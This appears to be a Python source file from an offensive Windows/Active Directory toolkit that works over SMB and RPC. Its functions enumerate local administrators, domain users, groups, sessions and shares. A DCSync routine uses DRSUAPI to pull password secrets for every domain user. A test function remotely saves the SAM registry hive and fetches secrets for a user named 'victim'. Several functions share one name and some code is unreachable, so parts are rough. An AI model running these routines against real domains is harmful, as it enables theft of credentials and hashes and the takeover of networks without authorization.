async def list_localgroup_members(connection_string, groupname = 'Administrators', out_file = None, json_out = False):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
await connection.login()
async with SMBSAMR(connection) as samr:
logging.debug('Connecting to SAMR')
try:
await samr.connect()
except Exception as e:
logging.exception('Failed to connect to SAMR')
#list domain
found = False
async for domain in samr.list_domains():
#print(domain)
if domain == 'Builtin':
found = True
logging.info('[+] Found Builtin domain')
if found == False:
raise Exception('[-] Could not find Builtin domain. Fail.')
#open domain
domain_sid = await samr.get_domain_sid('Builtin')
domain_handle = await samr.open_domain(domain_sid)
#list aliases
found = False
target_rid = None
async for name, rid in samr.list_aliases(domain_handle):
#print(name, rid)
if name == groupname:
target_rid = rid
found = True
logging.info('[+] Found %s group!' % name)
break
if found == False:
raise Exception('[-] %s group not found! Fail.' % name)
#open alias
alias_handle = await samr.open_alias(domain_handle, target_rid)
#list alias memebers
async for sid in samr.list_alias_members(alias_handle):
print(sid)
print('Done!')
async def read_file(connection_string, filename): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() async with SMBFileReader(connection) as reader: await reader.open(filename) data = await reader.read() print(data)
async def filereader_test(connection_string, filename):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
await connection.login()
try:
t = SMBDRSUAPI(connection, 'TEST.corp')
await t.connect()
await t.open()
input('open succsess!')
await t.get_user_secrets('victim')
except Exception as e:
import traceback
traceback.print_exc()
print('Error! %s' % e)
return
tmpFileName = os.urandom(4).hex() + '.tmp'
rreg = SMBRemoteRegistryService(connection)
await rreg.save_hive('SAM', tmpFileName)
print('Success! Registry file should be in %s' %
('SYSTEM32\\' + tmpFileName))
await rreg.close()
return
rpctransport = SMBTransport(connection, filename=r'\srvsvc')
dce = rpctransport.get_dce_rpc()
await dce.connect()
await dce.bind(srvs.MSRPC_UUID_SRVS)
resp = await srvs.hNetrShareEnum(dce, 1)
print(resp['InfoStruct']['ShareInfo']['Level1']['Buffer'])
rpctransport = SMBTransport(connection, filename=r'\wkssvc')
dce = rpctransport.get_dce_rpc()
await dce.connect()
await dce.bind(wkst.MSRPC_UUID_WKST)
resp = await wkst.hNetrWkstaUserEnum(dce, 1)
print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
rpctransport = SMBTransport(connection, filename=r'\wkssvc')
dce = rpctransport.get_dce_rpc()
await dce.connect()
await dce.bind(wkst.MSRPC_UUID_WKST)
resp = await wkst.hNetrWkstaUserEnum(dce, 1)
print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
async def list_sessions(connection_string, filename = None, json_out = False):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
await connection.login()
async with SMBSRVS(connection) as srvs:
logging.debug('Connecting to SAMR')
try:
await srvs.connect()
except Exception as e:
logging.exception('Failed to connect to SAMR')
async for username, ip_addr in srvs.list_sessions():
print(username, ip_addr)
print('Done!')
async def filereader_test(connection_string, filename):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
try:
await connection.login()
except Exception as e:
print(str(e))
raise e
print(connection)
srvs = SMBSRVS(connection)
await srvs.connect()
async for name, share_type, remark in srvs.list_shares():
print(name, share_type, remark)
async def filereader_test(connection_string, filename):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
await connection.login()
samr = SMBSAMR(connection)
await samr.connect()
async for domain in samr.list_domains():
print('domain: %s' % domain)
domain_sid = await samr.get_domain_sid('TEST')
print(str(domain_sid))
domain_handle = await samr.open_domain(domain_sid)
print(domain_handle)
async for username in samr.list_domain_users(domain_handle):
print(username)
async for groupname in samr.list_domain_groups(domain_handle):
print(groupname)
async for sid, username in samr.enumerate_users(domain_handle):
print(username, sid)
user_handle = await samr.open_user(domain_handle, 1106)
input(user_handle)
async for sid in samr.get_user_group_memberships(user_handle):
print(sid)
#polling local goup users
local_domain_sid = await samr.get_domain_sid('Builtin')
domain_handle = await samr.open_domain(local_domain_sid)
alias_handle = await samr.open_alias(domain_handle, 544)
async for sid in samr.list_alias_members(alias_handle):
print(sid)
async def filereader_test(connection_string, filename):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
#try:
# await connection.login()
#except Exception as e:
# print(str(e))
# raise e
results_queue = asyncio.Queue()
host_scanner = SMBHostScanner(connection, results_queue=results_queue)
await host_scanner.run()
while True:
res = await results_queue.get()
print(type(res))
print(res)
async def dcsync(connection_string,
filename=None,
target_domain=None,
target_users=[],
json_out=False):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
await connection.login()
async with SMBSAMR(connection) as samr:
logging.debug('Connecting to SAMR')
try:
await samr.connect()
except Exception as e:
loggign.exception('Failed to connect to SAMR')
if target_domain is None:
logging.debug('No domain defined, fetching it from SAMR')
logging.debug('Fetching domains...')
async for domain in samr.list_domains():
if target_domain is None: #using th first available
target_domain = domain
logging.debug('Domain available: %s' % domain)
logging.debug('Using domain: %s' % target_domain)
async with SMBDRSUAPI(connection, target_domain) as drsuapi:
try:
await drsuapi.connect()
await drsuapi.open()
except:
logging.exception('Failed to connect to DRSUAPI!')
if len(target_users) > 0:
if filename is not None:
with open(filename, 'w') as f:
for username in target_users:
secrets = await drsuapi.get_user_secrets(
username)
if json_out == True:
f.write(json.dumps(secrets.to_dict()))
else:
f.write(str(secrets))
else:
for username in target_users:
secrets = await drsuapi.get_user_secrets(username)
print(str(secrets))
else:
domain_sid = await samr.get_domain_sid(target_domain)
domain_handle = await samr.open_domain(domain_sid)
if filename is not None:
with open(filename, 'w') as f:
async for username, user_sid in samr.list_domain_users(
domain_handle):
secrets = await drsuapi.get_user_secrets(
username)
if json_out == True:
f.write(
json.dumps(secrets.to_dict()) + '\r\n')
else:
f.write(str(secrets))
else:
async for username, user_sid in samr.list_domain_users(
domain_handle):
secrets = await drsuapi.get_user_secrets(username)
print(str(secrets))
print('Done!')